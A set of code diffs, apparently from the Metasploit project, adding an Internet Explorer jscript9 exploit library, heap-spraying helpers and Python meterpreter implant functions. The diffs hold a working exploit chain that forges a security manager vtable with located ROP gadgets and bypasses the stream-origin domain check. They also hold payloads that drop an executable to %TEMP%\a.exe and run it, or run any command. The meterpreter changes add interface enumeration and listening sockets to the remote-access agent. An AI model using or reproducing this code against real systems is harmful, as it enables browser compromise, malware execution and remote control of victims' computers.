+		//alert(original_securitymanager.toString(16));
+
+		this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
+		this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
+		this.write32( fake_securitymanager, fake_securitymanager_vtable );
+		this.write32(script_engine_addr + 0x21c, fake_securitymanager);
+
+		var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
+		var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
+		var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
+
+
+		this.write32( fake_securitymanager_vtable + 0x14,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
+
+		this.write32( fake_securitymanager_vtable + 0x10,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
+
+		this.payload.execute(this);
+
+
+		/*
+		* restore
+		*/
+
+		this.write32( script_engine_addr + 0x21c, original_securitymanager );
+
+		return true;
+
+	}
+
+	ExpLib.prototype.leakAddress = function(obj) {
+		this.arr_arr[this.arr2_idx + 1][2] = obj;
+		return this.read32(this.arr2_member_base + 0x1008);
+	}
+
+	ExpLib.prototype.switchStreamOrigin = function(stream) {
+		var obj = this.leakAddress(stream);
+		var stream_obj = this.read32(obj + 0x30);
+		//var url_addr = this.read32(stream_obj + 0x3c);
+		var url_addr = this.read32(stream_obj + this.stream_origin);
+
+		/*
+		* bypass domain check
+		*/
+		this.writeStringW( url_addr, 'file:///C:/1.htm' );
+	}
+
+	return ExpLib;
+
+})();
@@ -0,0 +1,33 @@
+function payload_drop_exec(pe) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
+		var filename = temp + "\\a.exe";
+
+		var bStream = new ActiveXObject("ADODB.Stream");
+		var txtStream = new ActiveXObject("ADODB.Stream");
+		bStream.Type = 1;
+		txtStream.Type = 2;
+
+		bStream.Open();
+		txtStream.Open();
+
+		explib.switchStreamOrigin(txtStream);
+
+		txtStream.WriteText(pe);
+		txtStream.Position = 2;
+		txtStream.CopyTo( bStream );
+		txtStream.Close();
+
+		explib.switchStreamOrigin(bStream);
+
+		bStream.SaveToFile(filename, 2);
+		bStream.Close();
+
+		oExec = WshShell.Exec(filename);
+	}
+
+	return this;
+}
@@ -0,0 +1,10 @@
+function payload_exec(cmd) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var oExec = WshShell.Exec(cmd);
+	}
+
+	return this;
+}
@@ -0,0 +1,192 @@
+//heapLib2 namespace
+function heapLib2() { } 
+
+//These are attributes that will not actually create a bstr 
+//and directly use the back-end allocator, completely bypassing the cache
+var global_attrs = ["title", "lang", "class"];
+
+heapLib2.ie = function(element, maxAlloc)
+{
+    //128mb
+    this.maxAlloc = 0x8000000;
+
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+
+    if(maxAlloc)
+        this.maxAlloc = maxAlloc; 
+
+    //empty the cache
+    this.Oleaut32EmptyCache();
+    this.Oleaut32FillCache();
+    this.Oleaut32EmptyCache();
+
+}
+
+heapLib2.ie.prototype.newelement = function(element)
+{
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+}
+
+heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok) 
+{
+    if(typeof(cache_ok)==='undefined')
+        cache_ok = false;
+    else
+        cache_ok = true;
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof size != "number")
+        throw "alloc.argument: size is not a number: " + size; 
+
+    //make sure the size isn't one of the special values
+    if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000)) 
+        throw "alloc.argument: size cannot be flushed from cache: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    //the size must be at a 16-byte boundary this can be commented out but 
+    //the allocations will be rounded to the nearest 16-byte boundary 
+    if(size % 16 != 0)
+        throw "alloc.argument: size be a multiple of 16: " + size;
+
+    //20-bytes will be added to the size
+    //<4-byte size><data><2-byte null>
+    size = ((size / 2) - 6);
+
+    //May have to change this due to allocation side effects
+    var data = new Array(size).join(cache_ok ? "C" : "$"); 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, data);
+
+}
+
+//These items will allocate/free memory and should really 
+//only be used once per element. You can use a new element 
+//by calling the 'newelement' method above
+heapLib2.ie.prototype.alloc_nobstr = function(val)
+{
+    //make sure the aval is a string
+    if(typeof val != "string")
+        throw "alloc.argument: val is not a string"; 
+
+    var size = (val.length * 2) + 6; 
+
+    if(size > this.maxAlloc)
+        throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var i = 0;
+    var set_gattr = 0; 
+    for(i = 0; i < global_attrs.length; i++)
+    {
+        curr_gattr = global_attrs[i];
+        if(!this.element.getAttribute(curr_gattr))
+        {
+            this.element.setAttribute(curr_gattr, "");
+            this.element.setAttribute(curr_gattr, val);
+            set_gattr = 1;  
+            break; 
+        }
+    }
+
+    if(set_gattr == 0)
+        throw "alloc_nobstr: all global attributes are assigned, try a new element"; 
+}
+
+//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
+heapLib2.ie.prototype.sprayalloc = function(attr_name, str) 
+{
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof str != "string")
+        throw "alloc.argument: str is not a string: " + typeof str; 
+
+    var size = (str.length * 2) + 6; 
+
+    //make sure the size isn't one of the special values
+    if(size <= 0x8000) 
+        throw "alloc.argument: bigalloc must be greater than 0x8000: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, str);
+}
+
+heapLib2.ie.prototype.free = function(attr_name, skip_flush) 
+{
+    if(typeof(skip_flush)==='undefined')
+        skip_flush = false;
+    else
+        skip_flush = true;
+
+    //make sure that an HTML DOM element is passed
+    if(!this.element.nodeType || this.element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(!this.element.getAttribute(attr_name))
+        throw "alloc.argument: element does not contain attribute: " + attr_name;
+
+    //make sure the cache is full so the chunk returns the general purpose heap
+    if(!skip_flush)
+        this.Oleaut32FillCache(); 
+
+    this.element.setAttribute(attr_name, null);
+
+    if(!skip_flush)
+        this.Oleaut32EmptyCache()
+}
+
+heapLib2.ie.prototype.Oleaut32FillCache = function()
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.free("cache0x20"+i, true); 
+        this.free("cache0x40"+i, true);
+        this.free("cache0x100"+i, true);
+        this.free("cache0x8000"+i, true);
+    }
+}
+
+heapLib2.ie.prototype.Oleaut32EmptyCache = function() 
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.alloc("cache0x20"+i, 0x20, true); 
+        this.alloc("cache0x40"+i, 0x40, true);
+        this.alloc("cache0x100"+i, 0x100, true);
+        this.alloc("cache0x8000"+i, 0x8000, true);
+    }
+}
@@ -1,10 +1,18 @@
-function postInfo(path, data) {
+function postInfo(path, data, cb) {
  var xmlHttp = new XMLHttpRequest();

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
  }

-  xmlHttp.open('POST', path, false);
+  xmlHttp.open('POST', path, !!cb);
+
+  if (cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
+    };
+  }
+
  xmlHttp.send(data);
-}
+  return xmlHttp;
+}
@@ -1,4 +1,3 @@
-import ctypes
 import fnmatch
 import getpass
 import os
@@ -9,8 +8,15 @@ import socket
 import struct
 import subprocess
 import sys
+import time

-has_windll = hasattr(ctypes, 'windll')
+try:
+	import ctypes
+	has_ctypes = True
+	has_windll = hasattr(ctypes, 'windll')
+except ImportError:
+	has_ctypes = False
+	has_windll = False

 try:
 	import pty
@@ -24,6 +30,12 @@ try:
 except ImportError:
 	has_pwd = False

+try:
+	import SystemConfiguration as osxsc
+	has_osxsc = True
+except ImportError:
+	has_osxsc = False
+
 try:
 	import termios
 	has_termios = True
@@ -36,52 +48,197 @@ try:
 except ImportError:
 	has_winreg = False

-class PROCESSENTRY32(ctypes.Structure):
-	_fields_ = [("dwSize", ctypes.c_uint32),
-		("cntUsage", ctypes.c_uint32),
-		("th32ProcessID", ctypes.c_uint32),
-		("th32DefaultHeapID", ctypes.c_void_p),
-		("th32ModuleID", ctypes.c_uint32),
-		("cntThreads", ctypes.c_uint32),
-		("th32ParentProcessID", ctypes.c_uint32),
-		("thPriClassBase", ctypes.c_int32),
-		("dwFlags", ctypes.c_uint32),
-		("szExeFile", (ctypes.c_char * 260))]
+if has_ctypes:
+	#
+	# Windows Structures
+	#
+	class SOCKADDR(ctypes.Structure):
+		_fields_ = [("sa_family", ctypes.c_ushort),
+			("sa_data", (ctypes.c_uint8 * 14))]

-class SYSTEM_INFO(ctypes.Structure):
-	_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
-		("wReserved", ctypes.c_uint16),
-		("dwPageSize", ctypes.c_uint32),
-		("lpMinimumApplicationAddress", ctypes.c_void_p),
-		("lpMaximumApplicationAddress", ctypes.c_void_p),
-		("dwActiveProcessorMask", ctypes.c_uint32),
-		("dwNumberOfProcessors", ctypes.c_uint32),
-		("dwProcessorType", ctypes.c_uint32),
-		("dwAllocationGranularity", ctypes.c_uint32),
-		("wProcessorLevel", ctypes.c_uint16),
-		("wProcessorRevision", ctypes.c_uint16),]
+	class SOCKET_ADDRESS(ctypes.Structure):
+		_fields_ = [("lpSockaddr", ctypes.POINTER(SOCKADDR)),
+			("iSockaddrLength", ctypes.c_int)]

-class SID_AND_ATTRIBUTES(ctypes.Structure):
-	_fields_ = [("Sid", ctypes.c_void_p),
-		("Attributes", ctypes.c_uint32),]
+	class IP_ADAPTER_UNICAST_ADDRESS(ctypes.Structure):
+		_fields_ = [
+			("s", type(
+					'_s_IP_ADAPTER_UNICAST_ADDRESS',
+					(ctypes.Structure,),
+					dict(_fields_ = [
+						("Length", ctypes.c_ulong),
+						("Flags", ctypes.c_uint32)
+					])
+			)),
+			("Next", ctypes.c_void_p),
+			("Address", SOCKET_ADDRESS),
+			("PrefixOrigin", ctypes.c_uint32),
+			("SuffixOrigin", ctypes.c_uint32),
+			("DadState", ctypes.c_uint32),
+			("ValidLifetime", ctypes.c_ulong),
+			("PreferredLifetime", ctypes.c_ulong),
+			("LeaseLifetime", ctypes.c_ulong),
+			("OnLinkPrefixLength", ctypes.c_uint8)]

-##
-# STDAPI
-##
+	class IP_ADAPTER_ADDRESSES(ctypes.Structure):
+		_fields_ = [
+			("u", type(
+				'_u_IP_ADAPTER_ADDRESSES',
+				(ctypes.Union,),
+				dict(_fields_ = [
+					("Alignment", ctypes.c_ulonglong),
+					("s", type(
+						'_s_IP_ADAPTER_ADDRESSES',
+						(ctypes.Structure,),
+						dict(_fields_ = [
+							("Length", ctypes.c_ulong),
+							("IfIndex", ctypes.c_uint32)
+						])
+					))
+				])
+			)),
+			("Next", ctypes.c_void_p),
+			("AdapterName", ctypes.c_char_p),
+			("FirstUnicastAddress", ctypes.c_void_p),
+			("FirstAnycastAddress", ctypes.c_void_p),
+			("FirstMulticastAddress", ctypes.c_void_p),
+			("FirstDnsServerAddress", ctypes.c_void_p),
+			("DnsSuffix", ctypes.c_wchar_p),
+			("Description", ctypes.c_wchar_p),
+			("FriendlyName", ctypes.c_wchar_p),
+			("PhysicalAddress", (ctypes.c_uint8 * 8)),
+			("PhysicalAddressLength", ctypes.c_uint32),
+			("Flags", ctypes.c_uint32),
+			("Mtu", ctypes.c_uint32),
+			("IfType", ctypes.c_uint32),
+			("OperStatus", ctypes.c_uint32),
+			("Ipv6IfIndex", ctypes.c_uint32),
+			("ZoneIndices", (ctypes.c_uint32 * 16)),
+			("FirstPrefix", ctypes.c_void_p),
+			("TransmitLinkSpeed", ctypes.c_uint64),
+			("ReceiveLinkSpeed", ctypes.c_uint64),
+			("FirstWinsServerAddress", ctypes.c_void_p),
+			("FirstGatewayAddress", ctypes.c_void_p),
+			("Ipv4Metric", ctypes.c_ulong),
+			("Ipv6Metric", ctypes.c_ulong),
+			("Luid", ctypes.c_uint64),
+			("Dhcpv4Server", SOCKET_ADDRESS),
+			("CompartmentId", ctypes.c_uint32),
+			("NetworkGuid", (ctypes.c_uint8 * 16)),
+			("ConnectionType", ctypes.c_uint32),
+			("TunnelType", ctypes.c_uint32),
+			("Dhcpv6Server", SOCKET_ADDRESS),
+			("Dhcpv6ClientDuid", (ctypes.c_uint8 * 130)),
+			("Dhcpv6ClientDuidLength", ctypes.c_ulong),
+			("Dhcpv6Iaid", ctypes.c_ulong),
+			("FirstDnsSuffix", ctypes.c_void_p)]
+
+	class MIB_IFROW(ctypes.Structure):
+		_fields_ = [("wszName", (ctypes.c_wchar * 256)),
+			("dwIndex", ctypes.c_uint32),
+			("dwType", ctypes.c_uint32),
+			("dwMtu", ctypes.c_uint32),
+			("dwSpeed", ctypes.c_uint32),
+			("dwPhysAddrLen", ctypes.c_uint32),
+			("bPhysAddr", (ctypes.c_uint8 * 8)),
+			("dwAdminStatus", ctypes.c_uint32),
+			("dwOperStaus", ctypes.c_uint32),
+			("dwLastChange", ctypes.c_uint32),
+			("dwInOctets", ctypes.c_uint32),
+			("dwInUcastPkts", ctypes.c_uint32),
+			("dwInNUcastPkts", ctypes.c_uint32),
+			("dwInDiscards", ctypes.c_uint32),
+			("dwInErrors", ctypes.c_uint32),
+			("dwInUnknownProtos", ctypes.c_uint32),
+			("dwOutOctets", ctypes.c_uint32),
+			("dwOutUcastPkts", ctypes.c_uint32),
+			("dwOutNUcastPkts", ctypes.c_uint32),
+			("dwOutDiscards", ctypes.c_uint32),
+			("dwOutErrors", ctypes.c_uint32),
+			("dwOutQLen", ctypes.c_uint32),
+			("dwDescrLen", ctypes.c_uint32),
+			("bDescr", (ctypes.c_char * 256))]
+
+	class MIB_IPADDRROW(ctypes.Structure):
+		_fields_ = [("dwAddr", ctypes.c_uint32),
+			("dwIndex", ctypes.c_uint32),
+			("dwMask", ctypes.c_uint32),
+			("dwBCastAddr", ctypes.c_uint32),
+			("dwReasmSize", ctypes.c_uint32),
+			("unused1", ctypes.c_uint16),
+			("wType", ctypes.c_uint16)]
+
+	class PROCESSENTRY32(ctypes.Structure):
+		_fields_ = [("dwSize", ctypes.c_uint32),
+			("cntUsage", ctypes.c_uint32),
+			("th32ProcessID", ctypes.c_uint32),
+			("th32DefaultHeapID", ctypes.c_void_p),
+			("th32ModuleID", ctypes.c_uint32),
+			("cntThreads", ctypes.c_uint32),
+			("th32ParentProcessID", ctypes.c_uint32),
+			("thPriClassBase", ctypes.c_int32),
+			("dwFlags", ctypes.c_uint32),
+			("szExeFile", (ctypes.c_char * 260))]
+
+	class SID_AND_ATTRIBUTES(ctypes.Structure):
+		_fields_ = [("Sid", ctypes.c_void_p),
+			("Attributes", ctypes.c_uint32)]
+
+	class SYSTEM_INFO(ctypes.Structure):
+		_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
+			("wReserved", ctypes.c_uint16),
+			("dwPageSize", ctypes.c_uint32),
+			("lpMinimumApplicationAddress", ctypes.c_void_p),
+			("lpMaximumApplicationAddress", ctypes.c_void_p),
+			("dwActiveProcessorMask", ctypes.c_uint32),
+			("dwNumberOfProcessors", ctypes.c_uint32),
+			("dwProcessorType", ctypes.c_uint32),
+			("dwAllocationGranularity", ctypes.c_uint32),
+			("wProcessorLevel", ctypes.c_uint16),
+			("wProcessorRevision", ctypes.c_uint16)]
+
+	#
+	# Linux Structures
+	#
+	class IFADDRMSG(ctypes.Structure):
+		_fields_ = [("family", ctypes.c_uint8),
+			("prefixlen", ctypes.c_uint8),
+			("flags", ctypes.c_uint8),
+			("scope", ctypes.c_uint8),
+			("index", ctypes.c_int32)]
+
+	class IFINFOMSG(ctypes.Structure):
+		_fields_ = [("family", ctypes.c_uint8),
+			("pad", ctypes.c_int8),
+			("type", ctypes.c_uint16),
+			("index", ctypes.c_int32),
+			("flags", ctypes.c_uint32),
+			("chagen", ctypes.c_uint32)]
+
+	class NLMSGHDR(ctypes.Structure):
+		_fields_ = [("len", ctypes.c_uint32),
+			("type", ctypes.c_uint16),
+			("flags", ctypes.c_uint16),
+			("seq", ctypes.c_uint32),
+			("pid", ctypes.c_uint32)]
+
+	class RTATTR(ctypes.Structure):
+		_fields_ = [("len", ctypes.c_uint16),
+			("type", ctypes.c_uint16)]

 #
 # TLV Meta Types
 #
-TLV_META_TYPE_NONE =       (   0   )
-TLV_META_TYPE_STRING =     (1 << 16)
-TLV_META_TYPE_UINT =       (1 << 17)
-TLV_META_TYPE_RAW =        (1 << 18)
-TLV_META_TYPE_BOOL =       (1 << 19)
+TLV_META_TYPE_NONE       = (   0   )
+TLV_META_TYPE_STRING     = (1 << 16)
+TLV_META_TYPE_UINT       = (1 << 17)
+TLV_META_TYPE_RAW        = (1 << 18)
+TLV_META_TYPE_BOOL       = (1 << 19)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
-TLV_META_TYPE_GROUP =      (1 << 30)
-TLV_META_TYPE_COMPLEX =    (1 << 31)
+TLV_META_TYPE_GROUP      = (1 << 30)
+TLV_META_TYPE_COMPLEX    = (1 << 31)
 # not defined in original
-TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
+TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)

 #
 # TLV Specific Types
@@ -135,16 +292,21 @@ TLV_TYPE_SEARCH_RESULTS        = TLV_META_TYPE_GROUP   | 1233
 ##
 TLV_TYPE_HOST_NAME             = TLV_META_TYPE_STRING  | 1400
 TLV_TYPE_PORT                  = TLV_META_TYPE_UINT    | 1401
+TLV_TYPE_INTERFACE_MTU         = TLV_META_TYPE_UINT    | 1402
+TLV_TYPE_INTERFACE_FLAGS       = TLV_META_TYPE_STRING  | 1403
+TLV_TYPE_INTERFACE_INDEX       = TLV_META_TYPE_UINT    | 1404

 TLV_TYPE_SUBNET                = TLV_META_TYPE_RAW     | 1420
 TLV_TYPE_NETMASK               = TLV_META_TYPE_RAW     | 1421
 TLV_TYPE_GATEWAY               = TLV_META_TYPE_RAW     | 1422
 TLV_TYPE_NETWORK_ROUTE         = TLV_META_TYPE_GROUP   | 1423
+TLV_TYPE_IP_PREFIX             = TLV_META_TYPE_UINT    | 1424

 TLV_TYPE_IP                    = TLV_META_TYPE_RAW     | 1430
 TLV_TYPE_MAC_ADDRESS           = TLV_META_TYPE_RAW     | 1431
 TLV_TYPE_MAC_NAME              = TLV_META_TYPE_STRING  | 1432
 TLV_TYPE_NETWORK_INTERFACE     = TLV_META_TYPE_GROUP   | 1433
+TLV_TYPE_IP6_SCOPE             = TLV_META_TYPE_RAW     | 1434

 TLV_TYPE_SUBNET_STRING         = TLV_META_TYPE_STRING  | 1440
 TLV_TYPE_NETMASK_STRING        = TLV_META_TYPE_STRING  | 1441
@@ -290,9 +452,39 @@ ERROR_FAILURE = 1
 # errors.
 ERROR_CONNECTION_ERROR = 10000

+# Windows Constants
+GAA_FLAG_SKIP_ANYCAST    = 0x0002
+GAA_FLAG_SKIP_MULTICAST  = 0x0004
+GAA_FLAG_INCLUDE_PREFIX  = 0x0010
+GAA_FLAG_SKIP_DNS_SERVER = 0x0080
+
 WIN_AF_INET  = 2
 WIN_AF_INET6 = 23

+# Linux Constants
+RTM_GETLINK   = 18
+RTM_GETADDR   = 22
+RTM_GETROUTE  = 26
+
+IFLA_ADDRESS   = 1
+IFLA_BROADCAST = 2
+IFLA_IFNAME    = 3
+IFLA_MTU       = 4
+
+IFA_ADDRESS    = 1
+IFA_LABEL      = 3
+
+def calculate_32bit_netmask(bits):
+	if bits == 32:
+		return 0xffffffff
+	return ((0xffffffff << (32-(bits%32))) & 0xffffffff)
+
+def cstruct_unpack(structure, raw_data):
+	if not isinstance(structure, ctypes.Structure):
+		structure = structure()
+	ctypes.memmove(ctypes.byref(structure), raw_data, ctypes.sizeof(structure))
+	return structure
+
 def get_stat_buffer(path):
 	si = os.stat(path)
 	rdev = 0
@@ -310,20 +502,30 @@ def get_stat_buffer(path):
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf

-def inet_pton(family, address):
-	if hasattr(socket, 'inet_pton'):
-		return socket.inet_pton(family, address)
-	elif has_windll:
-		WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
-		lpAddress = (ctypes.c_ubyte * 28)()
-		lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
-		if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
-			raise Exception('WSAStringToAddress failed')
-		if family == socket.AF_INET:
-			return ''.join(map(chr, lpAddress[4:8]))
-		elif family == socket.AF_INET6:
-			return ''.join(map(chr, lpAddress[8:24]))
-	raise Exception('no suitable inet_pton functionality is available')
+def netlink_request(req_type):
+	# See RFC 3549
+	NLM_F_REQUEST    = 0x0001
+	NLM_F_ROOT       = 0x0100
+	NLMSG_ERROR      = 0x0002
+	NLMSG_DONE       = 0x0003
+
+	sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
+	sock.bind((os.getpid(), 0))
+	seq = int(time.time())
+	nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
+	sfd = os.fdopen(sock.fileno(), 'w+b')
+	sfd.write(nlmsg)
+	responses = []
+	response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
+	while response.type != NLMSG_DONE:
+		if response.type == NLMSG_ERROR:
+			break
+		response_data = sfd.read(response.len - 16)
+		responses.append(response_data)
+		response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
+	sfd.close()
+	sock.close()
+	return responses

 def resolve_host(hostname, family):
 	address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
@@ -338,8 +540,17 @@ def windll_GetNativeSystemInfo():
 	ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
 	return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)

+def windll_GetVersion():
+	if not has_windll:
+		return None
+	dwVersion = ctypes.windll.kernel32.GetVersion()
+	dwMajorVersion =  (dwVersion & 0x000000ff)
+	dwMinorVersion = ((dwVersion & 0x0000ff00) >> 8)
+	dwBuild        = ((dwVersion & 0xffff0000) >> 16)
+	return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
+
@meterpreter.register_function
-def channel_create_stdapi_fs_file(request, response):
+def channel_open_stdapi_fs_file(request, response):
 	fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
 	if fmode:
@@ -353,7 +564,7 @@ def channel_create_stdapi_fs_file(request, response):
 	return ERROR_SUCCESS, response

@meterpreter.register_function
-def channel_create_stdapi_net_tcp_client(request, response):
+def channel_open_stdapi_net_tcp_client(request, response):
 	host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
 	port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
 	local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
@@ -373,7 +584,19 @@ def channel_create_stdapi_net_tcp_client(request, response):
 			pass
 	if not connected:
 		return ERROR_CONNECTION_ERROR, response
-	channel_id = meterpreter.add_channel(sock)
+	channel_id = meterpreter.add_channel(MeterpreterSocketClient(sock))
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def channel_open_stdapi_net_tcp_server(request, response):
+	local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '0.0.0.0')
+	local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
+	server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+	server_sock.bind((local_host, local_port))
+	server_sock.listen(socket.SOMAXCONN)
+	channel_id = meterpreter.add_channel(MeterpreterSocketServer(server_sock))
 	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
 	return ERROR_SUCCESS, response

@@ -675,12 +898,12 @@ def stdapi_fs_ls(request, response):

@meterpreter.register_function
 def stdapi_fs_md5(request, response):
-	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
-		import md5
-		m = md5.new()
-	else:
+	try:
 		import hashlib
 		m = hashlib.md5()
+	except ImportError:
+		import md5
+		m = md5.new()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
 	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
@@ -722,12 +945,12 @@ def stdapi_fs_separator(request, response):

@meterpreter.register_function
 def stdapi_fs_sha1(request, response):
-	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
-		import sha1
-		m = sha1.new()
-	else:
+	try:
 		import hashlib
 		m = hashlib.sha1()
+	except ImportError:
+		import sha
+		m = sha.new()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
 	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
@@ -740,6 +963,235 @@ def stdapi_fs_stat(request, response):
 	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
 	return ERROR_SUCCESS, response

+@meterpreter.register_function
+def stdapi_net_config_get_interfaces(request, response):
+	if hasattr(socket, 'AF_NETLINK'):
+		interfaces = stdapi_net_config_get_interfaces_via_netlink()
+	elif has_osxsc:
+		interfaces = stdapi_net_config_get_interfaces_via_osxsc()
+	elif has_windll:
+		interfaces = stdapi_net_config_get_interfaces_via_windll()
+	else:
+		return ERROR_FAILURE, response
+	for iface_info in interfaces:
+		iface_tlv  = ''
+		iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
+		iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
+		if 'mtu' in iface_info:
+			iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_MTU, iface_info['mtu'])
+		if 'flags' in iface_info:
+			iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_FLAGS, iface_info['flags'])
+		iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_INDEX, iface_info['index'])
+		for address in iface_info.get('addrs', []):
+			iface_tlv += tlv_pack(TLV_TYPE_IP, address[1])
+			if isinstance(address[2], (int, long)):
+				iface_tlv += tlv_pack(TLV_TYPE_IP_PREFIX, address[2])
+			else:
+				iface_tlv += tlv_pack(TLV_TYPE_NETMASK, address[2])
+		response += tlv_pack(TLV_TYPE_NETWORK_INTERFACE, iface_tlv)
+	return ERROR_SUCCESS, response
+
+def stdapi_net_config_get_interfaces_via_netlink():
+	rta_align = lambda l: l+3 & ~3
+	iface_flags = {
+		0x0001: 'UP',
+		0x0002: 'BROADCAST',
+		0x0008: 'LOOPBACK',
+		0x0010: 'POINTTOPOINT',
+		0x0040: 'RUNNING',
+		0x0100: 'PROMISC',
+		0x1000: 'MULTICAST'
+	}
+	iface_flags_sorted = iface_flags.keys()
+	# Dictionaries don't maintain order
+	iface_flags_sorted.sort()
+	interfaces = {}
+
+	responses = netlink_request(RTM_GETLINK)
+	for res_data in responses:
+		iface = cstruct_unpack(IFINFOMSG, res_data)
+		iface_info = {'index':iface.index}
+		flags = []
+		for flag in iface_flags_sorted:
+			if (iface.flags & flag):
+				flags.append(iface_flags[flag])
+		iface_info['flags'] = ' '.join(flags)
+		cursor = ctypes.sizeof(IFINFOMSG)
+		while cursor < len(res_data):
+			attribute = cstruct_unpack(RTATTR, res_data[cursor:])
+			at_len = attribute.len
+			attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
+			cursor += rta_align(at_len)
+
+			if attribute.type == IFLA_ADDRESS:
+				iface_info['hw_addr'] = attr_data
